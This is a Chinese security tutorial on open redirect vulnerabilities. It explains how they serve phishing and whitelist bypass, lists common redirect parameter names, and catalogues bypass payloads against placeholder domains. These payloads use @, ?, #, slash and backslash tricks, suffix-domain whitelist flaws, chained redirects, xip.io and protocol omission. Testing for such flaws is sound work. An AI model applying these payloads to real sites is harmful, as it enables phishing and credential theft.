下载帮

您现在的位置是:首页 > 教程分享 > 经验技巧

经验技巧

url任意跳转漏洞

2022-02-10 12:17经验技巧

服务端未对传入的跳转url 变量进行检查和控制,可能导致构造任意一个恶意地址,诱导用户跳转到恶意网站。由于是从可信的站点跳转出去的,用户会比较信任,所以跳转漏洞一般用于钓鱼攻击,通过转到恶意网站欺骗用户输入用户名和密码盗取用户信息,或欺骗用户进行金钱交易;还可以造成xss 漏洞。

攻击方式及危害>

url跳转中最常见的跳转在登陆口,支付口,也有跳转目录的同样可以跳转URL。借助URL 跳转,也可以突破常见的基于“白名单方式”的一些安全限制,如传统IM 里对于URL 的传播会进行安全校验,但是对于大公司的域名或URL 将直接允许通过并且显示会可信的URL,而一旦该URL 里包含一些跳转漏洞将可能导致安全限制被绕过。如果引用一些资源的限制是依赖于“白名单方式”,同样可能被绕过导致安全风险,如,常见的一些应用允许引入可信站点,如baidu.com 的视频,限制方式往往是检查URL 是否是baidu.com 来实现,如果baidu.com 内含一个url 跳转漏洞,将导致最终引入的资源属于不可信的第三方资源或者恶意站点,最终导致安全问题。

漏洞检测

修改参数中的合法URL 为非法URL,然后查看是否能正常跳转或者响应包是否包含了任意的构造URL

  • 常见参数:
    redirect
    url
    redirectUrl
    callback
    return_url
    toUrl
    ReturnUrl
    fromUrl
    redUrl
    request
    redirect_to
    redirect_url
    jump
    jump_to
    target
    to
    goto
    link
    linkto
    domain
    oauth_callback

bypass(绕过)

例子:
存在URL重定向漏洞的网站http://www.aaa.com/acb
login.aaa.com是一个子域名
http://test.com是重定向的目标网站

  • @绕过
    用这方法在火狐里进行跳转,会有弹窗提示,在其它游览器则没有
    http://www.aaa.com/acb?Url=http://[email protected]//ssrf也可用
    后面的test.com 就是要跳转到的域名,前面的域名都是用来辅助以绕过限制的

  • ?绕过
    http://www.aaa.com/acb?Url=http://test.com?login.aaa.com
    ?放到你添加的想要跳转的域名的后面,

  • #绕过
    http://www.aaa.com/acb?Url=http://test.com#login.aaa.com

  • /绕过
    http://www.aaa.com/acb?Url=http://test.com/login.aaa.com
    正斜杠前面跟上你想跳转的域名地址

  • \绕过

    • 两个反斜杠绕过方法
      http://www.aaa.com/acb?Url=http://test.com\\login.aaa.com
      两个反斜杠前面跟上你想跳转的域名地址
    • 一个反斜杠绕过方法
      http://www.aaa.com/acb?Url=http://test.com\login.aaa.com
    • 一个反斜杠一个点
      http://www.aaa.com/acb?Url=http://test.com\.login.aaa.com
  • 利用白名单缺陷绕过限制
    有的域名白名单限制是不全的,比如如果想利用一个跳转,而这个跳转是通用,在这个公司网站很多子域名等都可以跳转,那么你买个域名也不算贵对吧,为什么这么说呢,这个问题就是白名单限制不当,比如,当跳转的域名包含这个网站下的所有域名,
    比如:http://www.aaa.com/acb?Url=http://login.aaa.com
    这个login.aaa.com 也可以改成aaa.com 同样可以跳转对吧,因为白名单里只要有包含这个域名就直接成功跳转。那么当我在这个域名前面加上如testaaa.com,白名单里会检查是否包含aaa.com 这个域名,包含,然后直接跳转,而并没有检查这个域名的整个信息,然后可以利用这个问题,直接注册一个testaaa.com 这个域名就可以利用这个跳转。

  • 多重验证&跳转绕过限制
    比如你登陆账户后会出现另一个验证页面,输入手机验证码进行验证,此时这上面的URL 很可能存在任意跳转的问题。多重跳转的问题导致可绕过URL 限制
    http://www.aaa.com/acb?Url=http://login.aaa.com/acb?url=http://login.aaa.com
    这个结构的多重跳转你修改最后面的URL 就可以达到任意URL 跳转,中间的URL 就没必要动了。

  • 点击触发达到绕过URL 跳转限制
    比如很多登陆页面的地方,其URL 是一个跳转的URL,
    如:http://www.aaa.com/acb?Url=http://test.com
    你直接修改了后面为任意URL,但是还是停留在原地,似乎没什么问题,但是,当你输入账号和密码后点击登陆按钮后,就会触发跳转,当然,这个账户和密码不一定要对的,随便都可以,但得视系统而定吧。

  • xip.io绕过
    http://127.0.0.1/url.php?username=1&password=1&redict=http://www.xiaozhupeiqi.com.220.181.57.217.xip.io会跳转到百度

  • 白名单网站可信
    如果url跳转点信任百度url,google url或者其他,则可以多次跳转达到自己的恶意界面。

  • 协议绕过
    http与https协议转换尝试,或者省略
    http://127.0.0.1/url.php?username=1&password=1&redict=//[email protected]
    http://127.0.0.1/url.php?username=1&password=1&redict=////[email protected]//多斜线

  • xss跳转

文章评论